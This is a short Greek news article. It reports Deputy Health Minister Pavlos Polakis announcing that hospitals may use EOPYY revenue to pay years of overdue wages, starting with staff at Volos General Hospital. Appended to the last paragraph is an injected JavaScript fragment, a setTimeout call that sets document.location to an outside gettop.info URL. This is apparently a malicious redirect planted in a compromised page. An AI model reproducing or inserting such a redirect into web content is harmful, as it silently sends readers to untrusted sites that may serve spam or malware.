Πολάκης: Από τον Ιανουάριο θα γυρίσουμε σε μια κανονικότητα

0
3

 

Απαντώντας σε επίκαιρη ερώτηση του βουλευτή της ΝΔ Χρήστου Μπουκώρου, σχετικά με την καταβολή δεδουλευμένων στους εργαζόμενους του γενικού νοσοκομείου Βόλου που εκκρεμούν από το 2014, ο αναπληρωτής υπουργός Υγείας Παύλος Πολάκης ανακοίνωσε διάταξη που θα δίνει τη δυνατότητα στα νοσοκομεία, να μπορούν να χρησιμοποιήσουν έσοδα από τον ΕΟΠΥΥ για να πληρώσουν οφειλές παλαιότερων ετών για εφημερίες, νυχτερινά, εξαιρέσιμα και υπερωρίες σε εργαζομένους τους. Το νομοσχέδιο για την Ψυχική Υγεία αναμένεται να ψηφιστεί μέσα στον Δεκέμβριο.

Ο κ. Πολάκης διαβεβαίωσε ότι η ρύθμιση θα αφορά όλα τα νοσοκομεία της χώρας και τόνισε ότι από τον Ιανουάριο «θα γυρίσουμε σε μια κανονικότητα».

Επεσήμανε ακόμα ότι φέτος για πρώτη φορά πολλά νοσοκομεία θα κλείσουν τον προϋπολογισμό τους χωρίς να δημιουργήσουν ληξιπρόθεσμες οφειλές, καθώς είναι πολύ μεγάλη η εκταμίευση από τον ΕΟΠΥΥ.

«Κάνουμε πολύ μεγάλη προσπάθεια να γυρίσουμε σε μια κανονικότητα και από το 2017 θα είναι άλλη μέρα», υπογράμμισε ο κ. Πολάκης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here